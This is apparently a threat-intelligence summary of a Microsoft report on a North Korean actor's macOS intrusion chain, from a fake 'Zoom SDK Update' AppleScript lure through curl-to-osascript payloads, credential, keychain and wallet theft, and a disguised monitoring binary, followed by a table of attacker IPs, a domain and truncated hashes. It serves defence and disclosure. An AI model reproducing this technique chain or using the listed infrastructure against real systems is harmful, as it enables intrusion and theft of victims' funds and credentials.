Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise
2026-04-16 • Microsoft •
Microsoft attributes a macOS intrusion chain to Sapphire Sleet, a North Korean state actor focused on cryptocurrency, finance, venture capital, and blockchain targets. The campaign uses recruiter-style social engineering to make victims run a fake “Zoom SDK Update.scpt” AppleScript, then chains curl-to-osascript payloads for reconnaissance, persistence, credential harvesting, TCC manipulation, and collection of wallets, browser data, keychains, Apple Notes, and Telegram data. A disguised Mach-O host-monitoring component named com.apple.cli gathers system and process information while maintaining outbound connectivity to 83.136.208[.]246:6783, alongside additional staged backdoor and credential-harvesting components. The activity matters because it shows Sapphire Sleet relying on trusted macOS utilities and user-initiated execution rather than software exploitation to bypass Gatekeeper, quarantine, notarization, and other platform controls.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| IPv4 | 83.136.210.180 | 2026-04-16 | 2026-04-27 |
| DOMAIN | check02id.com | 2026-04-16 | 2026-04-27 |
| IPv4 | 83.136.209.22 | 2026-04-16 | 2026-04-27 |
| IPv4 | 83.136.208.246 | 2026-04-16 | 2026-04-27 |
| IPv4 | 104.145.210.107 | 2026-04-16 | 2026-04-27 |
| HASH | 5fbbca2d72840feb86b6ef8a1abb4fe… | 2026-04-16 | 2026-04-16 |
| HASH | 8fd5b8db10458ace7e4ed335eb0c665… | 2026-04-16 | 2026-04-16 |
| HASH | 05e1761b535537287e7b72d103a29c4… | 2026-04-16 | 2026-04-16 |
| HASH | 5e581f22f56883ee13358f73fabab00… | 2026-04-16 | 2026-04-16 |
| HASH | 95e893e7cdde19d7d16ff5a5074d0b3… | 2026-04-16 | 2026-04-16 |
| HASH | a05400000843fbad6b28d2b76fc201c… | 2026-04-16 | 2026-04-16 |
| HASH | 2075fd1a1362d188290910a8c55cf30… | 2026-04-16 | 2026-04-16 |
| IPv4 | 83.136.208.48 | 2026-04-16 | 2026-04-16 |
| IPv4 | 188.227.196.252 | 2026-04-16 | 2026-04-16 |